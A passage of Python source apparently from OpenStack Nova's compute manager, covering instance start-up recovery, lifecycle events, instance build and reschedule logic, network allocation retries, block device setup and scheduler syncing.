task_states.PAUSING,
task_states.UNPAUSING]):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ACTIVE
instance.save()
elif (current_power_state == power_state.PAUSED and
instance.task_state == task_states.UNPAUSING):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state "
"and unpausing the instance"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
try:
self.unpause_instance(context, instance)
except NotImplementedError:
# Some virt driver didn't support pause and unpause
pass
except Exception:
LOG.exception(_LE('Failed to unpause instance'),
instance=instance)
return
if instance.task_state == task_states.POWERING_OFF:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying stop request",
instance.task_state, instance=instance)
self.stop_instance(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to stop instance')
LOG.exception(msg, instance=instance)
return
if instance.task_state == task_states.POWERING_ON:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying start request",
instance.task_state, instance=instance)
self.start_instance(context, instance)
except Exception:
# we don't want that an exception blocks the init_host
msg = _LE('Failed to start instance')
LOG.exception(msg, instance=instance)
return
net_info = compute_utils.get_nw_info_for_instance(instance)
try:
self.driver.plug_vifs(instance, net_info)
except NotImplementedError as e:
LOG.debug(e, instance=instance)
except exception.VirtualInterfacePlugException:
# we don't want an exception to block the init_host
LOG.exception(_LE("Vifs plug failed"), instance=instance)
self._set_instance_error_state(context, instance)
return
if instance.task_state == task_states.RESIZE_MIGRATING:
# We crashed during resize/migration, so roll back for safety
try:
# NOTE(mriedem): check old_vm_state for STOPPED here, if it's
# not in system_metadata we default to True for backwards
# compatibility
power_on = (instance.system_metadata.get('old_vm_state') !=
vm_states.STOPPED)
block_dev_info = self._get_instance_block_device_info(context,
instance)
self.driver.finish_revert_migration(context,
instance, net_info, block_dev_info, power_on)
except Exception:
LOG.exception(_LE('Failed to revert crashed migration'),
instance=instance)
finally:
LOG.info(_LI('Instance found in migrating state during '
'startup. Resetting task_state'),
instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.MIGRATING:
# Live migration did not complete, but instance is on this
# host, so reset the state.
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
db_state = instance.power_state
drv_state = self._get_power_state(context, instance)
expect_running = (db_state == power_state.RUNNING and
drv_state != db_state)
LOG.debug('Current state is %(drv_state)s, state in DB is '
'%(db_state)s.',
{'drv_state': drv_state, 'db_state': db_state},
instance=instance)
if expect_running and CONF.resume_guests_state_on_host_boot:
LOG.info(_LI('Rebooting instance after nova-compute restart.'),
instance=instance)
block_device_info = \
self._get_instance_block_device_info(context, instance)
try:
self.driver.resume_state_on_host_boot(
context, instance, net_info, block_device_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'resume guests'), instance=instance)
except Exception:
# NOTE(vish): The instance failed to resume, so we set the
# instance to error and attempt to continue.
LOG.warning(_LW('Failed to resume instance'),
instance=instance)
self._set_instance_error_state(context, instance)
elif drv_state == power_state.RUNNING:
# VMwareAPI drivers will raise an exception
try:
self.driver.ensure_filtering_rules_for_instance(
instance, net_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'firewall rules'), instance=instance)
def _retry_reboot(self, context, instance):
current_power_state = self._get_power_state(context, instance)
current_task_state = instance.task_state
retry_reboot = False
reboot_type = compute_utils.get_reboot_type(current_task_state,
current_power_state)
pending_soft = (current_task_state == task_states.REBOOT_PENDING and
instance.vm_state in vm_states.ALLOW_SOFT_REBOOT)
pending_hard = (current_task_state == task_states.REBOOT_PENDING_HARD
and instance.vm_state in vm_states.ALLOW_HARD_REBOOT)
started_not_running = (current_task_state in
[task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD] and
current_power_state != power_state.RUNNING)
if pending_soft or pending_hard or started_not_running:
retry_reboot = True
return retry_reboot, reboot_type
def handle_lifecycle_event(self, event):
LOG.info(_LI("VM %(state)s (Lifecycle Event)"),
{'state': event.get_name()},
instance_uuid=event.get_instance_uuid())
context = nova.context.get_admin_context(read_deleted='yes')
instance = objects.Instance.get_by_uuid(context,
event.get_instance_uuid(),
expected_attrs=[])
vm_power_state = None
if event.get_transition() == virtevent.EVENT_LIFECYCLE_STOPPED:
vm_power_state = power_state.SHUTDOWN
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_STARTED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_PAUSED:
vm_power_state = power_state.PAUSED
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_RESUMED:
vm_power_state = power_state.RUNNING
else:
LOG.warning(_LW("Unexpected power state %d"),
event.get_transition())
if vm_power_state is not None:
LOG.debug('Synchronizing instance power state after lifecycle '
'event "%(event)s"; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, VM power_state: '
'%(vm_power_state)s',
dict(event=event.get_name(),
vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
vm_power_state=vm_power_state),
instance_uuid=instance.uuid)
self._sync_instance_power_state(context,
instance,
vm_power_state)
def handle_events(self, event):
if isinstance(event, virtevent.LifecycleEvent):
try:
self.handle_lifecycle_event(event)
except exception.InstanceNotFound:
LOG.debug("Event %s arrived for non-existent instance. The "
"instance was probably deleted.", event)
else:
LOG.debug("Ignoring event %s", event)
def init_virt_events(self):
self.driver.register_event_listener(self.handle_events)
def init_host(self):
"""Initialization for a standalone compute service."""
self.driver.init_host(host=self.host)
context = nova.context.get_admin_context()
instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=['info_cache', 'metadata'])
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_on()
self.init_virt_events()
try:
# checking that instance was not already evacuated to other host
self._destroy_evacuated_instances(context)
for instance in instances:
self._init_instance(context, instance)
finally:
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_off()
self._update_scheduler_instance_info(context, instances)
def cleanup_host(self):
self.driver.register_event_listener(None)
self.instance_events.cancel_all_events()
self.driver.cleanup_host(host=self.host)
def pre_start_hook(self):
"""After the service is initialized, but before we fully bring
the service up by listening on RPC queues, make sure to update
our available resources (and indirectly our available nodes).
"""
self.update_available_resource(nova.context.get_admin_context())
def _get_power_state(self, context, instance):
"""Retrieve the power state for the given instance."""
LOG.debug('Checking state', instance=instance)
try:
return self.driver.get_info(instance).state
except exception.InstanceNotFound:
return power_state.NOSTATE
def get_console_topic(self, context):
"""Retrieves the console host for a project on this host.
Currently this is just set in the flags for each compute host.
"""
# TODO(mdragon): perhaps make this variable by console_type?
return '%s.%s' % (CONF.console_topic, CONF.console_host)
@wrap_exception()
def get_console_pool_info(self, context, console_type):
return self.driver.get_console_pool_info(console_type)
@wrap_exception()
def refresh_security_group_rules(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group rules.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_rules(security_group_id)
@wrap_exception()
def refresh_security_group_members(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group members.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_members(security_group_id)
@object_compat
@wrap_exception()
def refresh_instance_security_rules(self, context, instance):
"""Tell the virtualization driver to refresh security rules for
an instance.
Passes straight through to the virtualization driver.
Synchronise the call because we may still be in the middle of
creating the instance.
"""
@utils.synchronized(instance.uuid)
def _sync_refresh():
try:
return self.driver.refresh_instance_security_rules(instance)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'security groups.'), instance=instance)
return _sync_refresh()
@wrap_exception()
def refresh_provider_fw_rules(self, context):
"""This call passes straight through to the virtualization driver."""
return self.driver.refresh_provider_fw_rules()
def _get_instance_nw_info(self, context, instance):
"""Get a list of dictionaries of network data of an instance."""
return self.network_api.get_instance_nw_info(context, instance)
def _await_block_device_map_created(self, context, vol_id):
# TODO(yamahata): creating volume simultaneously
# reduces creation time?
# TODO(yamahata): eliminate dumb polling
start = time.time()
retries = CONF.block_device_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'block_device_retries' as 0."),
{'retries': retries})
# (1) treat negative config value as 0
# (2) the configured value is 0, one attempt should be made
# (3) the configured value is > 0, then the total number attempts
# is (retries + 1)
attempts = 1
if retries >= 1:
attempts = retries + 1
for attempt in range(1, attempts + 1):
volume = self.volume_api.get(context, vol_id)
volume_status = volume['status']
if volume_status not in ['creating', 'downloading']:
if volume_status == 'available':
return attempt
LOG.warning(_LW("Volume id: %(vol_id)s finished being "
"created but its status is %(vol_status)s."),
{'vol_id': vol_id,
'vol_status': volume_status})
break
greenthread.sleep(CONF.block_device_allocate_retries_interval)
raise exception.VolumeNotCreated(volume_id=vol_id,
seconds=int(time.time() - start),
attempts=attempt,
volume_status=volume_status)
def _decode_files(self, injected_files):
"""Base64 decode the list of files to inject."""
if not injected_files:
return []
def _decode(f):
path, contents = f
try:
decoded = base64.b64decode(contents)
return path, decoded
except TypeError:
raise exception.Base64Exception(path=path)
return [_decode(f) for f in injected_files]
def _run_instance(self, context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec):
"""Launch a new instance with specified options."""
extra_usage_info = {}
def notify(status, msg="", fault=None, **kwargs):
"""Send a create.{start,error,end} notification."""
type_ = "create.%(status)s" % dict(status=status)
info = extra_usage_info.copy()
info['message'] = msg
self._notify_about_instance_usage(context, instance, type_,
extra_usage_info=info, fault=fault, **kwargs)
try:
self._prebuild_instance(context, instance)
if request_spec and request_spec.get('image'):
image_meta = request_spec['image']
else:
image_meta = {}
extra_usage_info = {"image_name": image_meta.get('name', '')}
notify("start") # notify that build is starting
instance, network_info = self._build_instance(context,
request_spec, filter_properties, requested_networks,
injected_files, admin_password, is_first_time, node,
instance, image_meta, legacy_bdm_in_spec)
notify("end", msg=_("Success"), network_info=network_info)
except exception.RescheduledException as e:
# Instance build encountered an error, and has been rescheduled.
notify("error", fault=e)
except exception.BuildAbortException as e:
# Instance build aborted due to a non-failure
LOG.info(e)
notify("end", msg=e.format_message()) # notify that build is done
except Exception as e:
# Instance build encountered a non-recoverable error:
with excutils.save_and_reraise_exception():
self._set_instance_error_state(context, instance)
notify("error", fault=e) # notify that build failed
def _prebuild_instance(self, context, instance):
self._check_instance_exists(context, instance)
try:
self._start_building(context, instance)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = _("Instance disappeared before we could start it")
# Quickly bail out of here
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
def _validate_instance_group_policy(self, context, instance,
filter_properties):
# NOTE(russellb) Instance group policy is enforced by the scheduler.
# However, there is a race condition with the enforcement of
# anti-affinity. Since more than one instance may be scheduled at the
# same time, it's possible that more than one instance with an
# anti-affinity policy may end up here. This is a validation step to
# make sure that starting the instance here doesn't violate the policy.
scheduler_hints = filter_properties.get('scheduler_hints') or {}
group_hint = scheduler_hints.get('group')
if not group_hint:
return
@utils.synchronized(group_hint)
def _do_validation(context, instance, group_hint):
group = objects.InstanceGroup.get_by_hint(context, group_hint)
if 'anti-affinity' not in group.policies:
return
group_hosts = group.get_hosts(exclude=[instance.uuid])
if self.host in group_hosts:
msg = _("Anti-affinity instance group policy was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
_do_validation(context, instance, group_hint)
def _build_instance(self, context, request_spec, filter_properties,
requested_networks, injected_files, admin_password, is_first_time,
node, instance, image_meta, legacy_bdm_in_spec):
original_context = context
context = context.elevated()
# NOTE(danms): This method is deprecated, but could be called,
# and if it is, it will have an old megatuple for requested_networks.
if requested_networks is not None:
requested_networks_obj = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
else:
requested_networks_obj = None
# If neutron security groups pass requested security
# groups to allocate_for_instance()
if request_spec and self.is_neutron_security_groups:
security_groups = request_spec.get('security_group')
else:
security_groups = []
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node)
network_info = None
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
# b64 decode the files to inject:
injected_files_orig = injected_files
injected_files = self._decode_files(injected_files)
rt = self._get_resource_tracker(node)
try:
limits = filter_properties.get('limits', {})
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(original_context,
instance, requested_networks_obj, macs,
security_groups, dhcp_options)
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image_meta,
bdms)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(
context, instance, bdms)
set_access_ip = (is_first_time and
not instance.access_ip_v4 and
not instance.access_ip_v6)
instance = self._spawn(context, instance, image_meta,
network_info, block_device_info,
injected_files, admin_password,
set_access_ip=set_access_ip)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the spawn
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for deleted instance')
LOG.exception(msg, instance=instance)
raise exception.BuildAbortException(
instance_uuid=instance.uuid,
reason=_("Instance disappeared during build"))
except (exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException) as e:
# Don't try to reschedule, just log and reraise.
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.InvalidBDM:
with excutils.save_and_reraise_exception():
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for failed instance')
LOG.exception(msg, instance=instance)
except Exception:
exc_info = sys.exc_info()
# try to re-schedule instance:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
rescheduled = self._reschedule_or_error(original_context, instance,
exc_info, requested_networks, admin_password,
injected_files_orig, is_first_time, request_spec,
filter_properties, bdms, legacy_bdm_in_spec)
if rescheduled:
# log the original build error
self._log_original_error(exc_info, instance.uuid)
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=six.text_type(exc_info[1]))
else:
# not re-scheduling, go to error:
raise exc_info[0], exc_info[1], exc_info[2]
# spawn success
return instance, network_info
def _log_original_error(self, exc_info, instance_uuid):
LOG.error(_LE('Error: %s'), exc_info[1], instance_uuid=instance_uuid,
exc_info=exc_info)
def _reschedule_or_error(self, context, instance, exc_info,
requested_networks, admin_password, injected_files, is_first_time,
request_spec, filter_properties, bdms=None,
legacy_bdm_in_spec=True):
"""Try to re-schedule the build or re-raise the original build error to
error out the instance.
"""
original_context = context
context = context.elevated()
instance_uuid = instance.uuid
rescheduled = False
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'instance.create.error', fault=exc_info[1])
try:
LOG.debug("Clean up resource before rescheduling.",
instance=instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._shutdown_instance(context, instance,
bdms, requested_networks)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception:
# do not attempt retry if clean up failed:
with excutils.save_and_reraise_exception():
self._log_original_error(exc_info, instance_uuid)
try:
method_args = (request_spec, admin_password, injected_files,
requested_networks, is_first_time, filter_properties,
legacy_bdm_in_spec)
task_state = task_states.SCHEDULING
rescheduled = self._reschedule(original_context, request_spec,
filter_properties, instance,
self.scheduler_rpcapi.run_instance, method_args,
task_state, exc_info)
except Exception:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
return rescheduled
def _reschedule(self, context, request_spec, filter_properties,
instance, reschedule_method, method_args, task_state,
exc_info=None):
"""Attempt to re-schedule a compute operation."""
instance_uuid = instance.uuid
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance_uuid=instance_uuid)
return
if not request_spec:
LOG.debug("No request spec, will not reschedule",
instance_uuid=instance_uuid)
return
LOG.debug("Re-scheduling %(method)s: attempt %(num)d",
{'method': reschedule_method.func_name,
'num': retry['num_attempts']}, instance_uuid=instance_uuid)
# reset the task state:
self._instance_update(context, instance_uuid, task_state=task_state)
if exc_info:
# stringify to avoid circular ref problem in json serialization:
retry['exc'] = traceback.format_exception_only(exc_info[0],
exc_info[1])
reschedule_method(context, *method_args)
return True
@periodic_task.periodic_task
def _check_instance_build_time(self, context):
"""Ensure that instances are not stuck in build."""
timeout = CONF.instance_build_timeout
if timeout == 0:
return
filters = {'vm_state': vm_states.BUILDING,
'host': self.host}
building_insts = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
for instance in building_insts:
if timeutils.is_older_than(instance.created_at, timeout):
self._set_instance_error_state(context, instance)
LOG.warning(_LW("Instance build timed out. Set to error "
"state."), instance=instance)
def _check_instance_exists(self, context, instance):
"""Ensure an instance with the same name is not already present."""
if self.driver.instance_exists(instance):
raise exception.InstanceExists(name=instance.name)
def _start_building(self, context, instance):
"""Save the host and launched_on fields and log appropriately."""
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
self._instance_update(context, instance.uuid,
vm_state=vm_states.BUILDING,
task_state=None,
expected_task_state=(task_states.SCHEDULING,
None))
def _allocate_network_async(self, context, instance, requested_networks,
macs, security_groups, is_vpn, dhcp_options):
"""Method used to allocate networks in the background.
Broken out for testing.
"""
LOG.debug("Allocating IP information in the background.",
instance=instance)
retries = CONF.network_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'network_allocate_retries' as 0."),
{'retries': retries})
retries = 0
attempts = retries + 1
retry_time = 1
for attempt in range(1, attempts + 1):
try:
nwinfo = self.network_api.allocate_for_instance(
context, instance, vpn=is_vpn,
requested_networks=requested_networks,
macs=macs,
security_groups=security_groups,
dhcp_options=dhcp_options)
LOG.debug('Instance network_info: |%s|', nwinfo,
instance=instance)
instance.system_metadata['network_allocated'] = 'True'
# NOTE(JoshNang) do not save the instance here, as it can cause
# races. The caller shares a reference to instance and waits
# for this async greenthread to finish before calling
# instance.save().
return nwinfo
except Exception:
exc_info = sys.exc_info()
log_info = {'attempt': attempt,
'attempts': attempts}
if attempt == attempts:
LOG.exception(_LE('Instance failed network setup '
'after %(attempts)d attempt(s)'),
log_info)
raise exc_info[0], exc_info[1], exc_info[2]
LOG.warning(_LW('Instance failed network setup '
'(attempt %(attempt)d of %(attempts)d)'),
log_info, instance=instance)
time.sleep(retry_time)
retry_time *= 2
if retry_time > 30:
retry_time = 30
# Not reached.
def _build_networks_for_instance(self, context, instance,
requested_networks, security_groups):
# If we're here from a reschedule the network may already be allocated.
if strutils.bool_from_string(
instance.system_metadata.get('network_allocated', 'False')):
# NOTE(alex_xu): The network_allocated is True means the network
# resource already allocated at previous scheduling, and the
# network setup is cleanup at previous. After rescheduling, the
# network resource need setup on the new host.
self.network_api.setup_instance_network_on_host(
context, instance, instance.host)
return self._get_instance_nw_info(context, instance)
if not self.is_neutron_security_groups:
security_groups = []
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(context, instance,
requested_networks, macs, security_groups, dhcp_options)
if not instance.access_ip_v4 and not instance.access_ip_v6:
# If CONF.default_access_ip_network_name is set, grab the
# corresponding network and set the access ip values accordingly.
# Note that when there are multiple ips to choose from, an
# arbitrary one will be chosen.
network_name = CONF.default_access_ip_network_name
if not network_name:
return network_info
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
instance.save()
break
return network_info
def _allocate_network(self, context, instance, requested_networks, macs,
security_groups, dhcp_options):
"""Start network allocation asynchronously. Return an instance
of NetworkInfoAsyncWrapper that can be used to retrieve the
allocated networks when the operation has finished.
"""
# NOTE(comstud): Since we're allocating networks asynchronously,
# this task state has little meaning, as we won't be in this
# state for very long.
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.NETWORKING
instance.save(expected_task_state=[None])
self._update_resource_tracker(context, instance)
is_vpn = pipelib.is_vpn_image(instance.image_ref)
return network_model.NetworkInfoAsyncWrapper(
self._allocate_network_async, context, instance,
requested_networks, macs, security_groups, is_vpn,
dhcp_options)
def _default_root_device_name(self, instance, image_meta, root_bdm):
try:
return self.driver.default_root_device_name(instance,
image_meta,
root_bdm)
except NotImplementedError:
return compute_utils.get_next_device_name(instance, [])
def _default_device_names_for_instance(self, instance,
root_device_name,
*block_device_lists):
try:
self.driver.default_device_names_for_instance(instance,
root_device_name,
*block_device_lists)
except NotImplementedError:
compute_utils.default_device_names_for_instance(
instance, root_device_name, *block_device_lists)
def _default_block_device_names(self, context, instance,
image_meta, block_devices):
"""Verify that all the devices have the device_name set. If not,
provide a default name.
It also ensures that there is a root_device_name and is set to the
first block device in the boot sequence (boot_index=0).
"""
root_bdm = block_device.get_root_bdm(block_devices)
if not root_bdm:
return
# Get the root_device_name from the root BDM or the instance
root_device_name = None
update_root_bdm = False
if root_bdm.device_name:
root_device_name = root_bdm.device_name
instance.root_device_name = root_device_name
elif instance.root_device_name:
root_device_name = instance.root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
else:
root_device_name = self._default_root_device_name(instance,
image_meta,
root_bdm)
instance.root_device_name = root_device_name
root_bdm.device_name = root_device_name
update_root_bdm = True
if update_root_bdm:
root_bdm.save()
ephemerals = filter(block_device.new_format_is_ephemeral,
block_devices)
swap = filter(block_device.new_format_is_swap,
block_devices)
block_device_mapping = filter(
driver_block_device.is_block_device_mapping, block_devices)
self._default_device_names_for_instance(instance,
root_device_name,
ephemerals,
swap,
block_device_mapping)
def _prep_block_device(self, context, instance, bdms,
do_check_attach=True):
"""Set up the block device for an instance with error logging."""
try:
block_device_info = {
'root_device_name': instance.root_device_name,
'swap': driver_block_device.convert_swap(bdms),
'ephemerals': driver_block_device.convert_ephemerals(bdms),
'block_device_mapping': (
driver_block_device.attach_block_devices(
driver_block_device.convert_volumes(bdms),
context, instance, self.volume_api,
self.driver, do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_snapshots(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_images(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach) +
driver_block_device.attach_block_devices(
driver_block_device.convert_blanks(bdms),
context, instance, self.volume_api,
self.driver, self._await_block_device_map_created,
do_check_attach=do_check_attach))
}
if self.use_legacy_block_device_info:
for bdm_type in ('swap', 'ephemerals', 'block_device_mapping'):
block_device_info[bdm_type] = \
driver_block_device.legacy_block_devices(
block_device_info[bdm_type])
# Get swap out of the list
block_device_info['swap'] = driver_block_device.get_swap(
block_device_info['swap'])
return block_device_info
except exception.OverQuota:
msg = _LW('Failed to create block device for instance due to '
'being over volume resource quota')
LOG.warn(msg, instance=instance)
raise exception.InvalidBDM()
except Exception:
LOG.exception(_LE('Instance failed block device setup'),
instance=instance)
raise exception.InvalidBDM()
def _update_instance_after_spawn(self, context, instance):
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.launched_at = timeutils.utcnow()
configdrive.update_instance(instance)
@object_compat
def _spawn(self, context, instance, image_meta, network_info,
block_device_info, injected_files, admin_password,
set_access_ip=False):
"""Spawn an instance with error logging and update its power state."""
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
instance.save(expected_task_state=task_states.BLOCK_DEVICE_MAPPING)
try:
self.driver.spawn(context, instance, image_meta,
injected_files, admin_password,
network_info,
block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
self._update_instance_after_spawn(context, instance)
def _set_access_ip_values():
"""Add access ip values for a given instance.
If CONF.default_access_ip_network_name is set, this method will
grab the corresponding network and set the access ip values
accordingly. Note that when there are multiple ips to choose
from, an arbitrary one will be chosen.
"""
network_name = CONF.default_access_ip_network_name
if not network_name:
return
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
return
if set_access_ip:
_set_access_ip_values()
network_info.wait(do_raise=True)
instance.info_cache.network_info = network_info
# NOTE(JoshNang) This also saves the changes to the instance from
# _allocate_network_async, as they aren't saved in that function
# to prevent races.
instance.save(expected_task_state=task_states.SPAWNING)
return instance
def _update_scheduler_instance_info(self, context, instance):
"""Sends an InstanceList with created or updated Instance objects to
the Scheduler client.
In the case of init_host, the value passed will already be an
InstanceList. Other calls will send individual Instance objects that
have been created or resized. In this case, we create an InstanceList
object containing that Instance.
"""
if not self.send_instance_updates:
return
if isinstance(instance, objects.Instance):
instance = objects.InstanceList(objects=[instance])
context = context.elevated()
self.scheduler_client.update_instance_info(context, self.host,
instance)
def _delete_scheduler_instance_info(self, context, instance_uuid):
"""Sends the uuid of the deleted Instance to the Scheduler client."""
if not self.send_instance_updates:
return
context = context.elevated()
self.scheduler_client.delete_instance_info(context, self.host,
instance_uuid)
@periodic_task.periodic_task(spacing=CONF.scheduler_instance_sync_interval)
def _sync_scheduler_instance_info(self, context):
if not self.send_instance_updates:
return
context = context.elevated()
instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
uuids = [instance.uuid for instance in instances]
self.scheduler_client.sync_instance_info(context, self.host, uuids)
def _notify_about_instance_usage(self, context, instance, event_suffix,
network_info=None, system_metadata=None,
extra_usage_info=None, fault=None):
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, event_suffix,
network_info=network_info,
system_metadata=system_metadata,
extra_usage_info=extra_usage_info, fault=fault)
def _deallocate_network(self, context, instance,
requested_networks=None):
LOG.debug('Deallocating network for instance', instance=instance)
self.network_api.deallocate_for_instance(
context, instance, requested_networks=requested_networks)
def _get_instance_block_device_info(self, context, instance,
refresh_conn_info=False,
bdms=None):
"""Transform block devices to the driver block_device format."""
if not bdms:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
swap = driver_block_device.convert_swap(bdms)
ephemerals = driver_block_device.convert_ephemerals(bdms)
block_device_mapping = (
driver_block_device.convert_volumes(bdms) +
driver_block_device.convert_snapshots(bdms) +
driver_block_device.convert_images(bdms))
if not refresh_conn_info:
# if the block_device_mapping has no value in connection_info
# (returned as None), don't include in the mapping
block_device_mapping = [
bdm for bdm in block_device_mapping
if bdm.get('connection_info')]
else:
block_device_mapping = driver_block_device.refresh_conn_infos(
block_device_mapping, context, instance, self.volume_api,
self.driver)
if self.use_legacy_block_device_info:
swap = driver_block_device.legacy_block_devices(swap)
ephemerals = driver_block_device.legacy_block_devices(ephemerals)
block_device_mapping = driver_block_device.legacy_block_devices(
block_device_mapping)
# Get swap out of the list
swap = driver_block_device.get_swap(swap)
root_device_name = instance.get('root_device_name')
return {'swap': swap,
'root_device_name': root_device_name,
'ephemerals': ephemerals,
'block_device_mapping': block_device_mapping}
# NOTE(mikal): No object_compat wrapper on this method because its
# callers all pass objects already
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def build_and_run_instance(self, context, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
# NOTE(danms): Remove this in v4.0 of the RPC API
if (requested_networks and
not isinstance(requested_networks,
objects.NetworkRequestList)):
requested_networks = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
# NOTE(melwitt): Remove this in v4.0 of the RPC API
flavor = filter_properties.get('instance_type')
if flavor and not isinstance(flavor, objects.Flavor):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
flavor = objects.Flavor.get_by_id(context, flavor['id'])
filter_properties = dict(filter_properties, instance_type=flavor)
# NOTE(sahid): Remove this in v4.0 of the RPC API
if (limits and 'numa_topology' in limits and
isinstance(limits['numa_topology'], six.string_types)):
db_obj = jsonutils.loads(limits['numa_topology'])
limits['numa_topology'] = (
objects.NUMATopologyLimits.obj_from_db_obj(db_obj))
@utils.synchronized(instance.uuid)
def _locked_do_build_and_run_instance(*args, **kwargs):
# NOTE(danms): We grab the semaphore with the instance uuid
# locked because we could wait in line to build this instance
# for a while and we want to make sure that nothing else tries
# to do anything with this instance while we wait.
with self._build_semaphore:
self._do_build_and_run_instance(*args, **kwargs)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
utils.spawn_n(_locked_do_build_and_run_instance,
context, instance, image, request_spec,
filter_properties, admin_password, injected_files,
requested_networks, security_groups,
block_device_mapping, node, limits)
@hooks.add_hook('build_instance')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def _do_build_and_run_instance(self, context, instance, image,
request_spec, filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
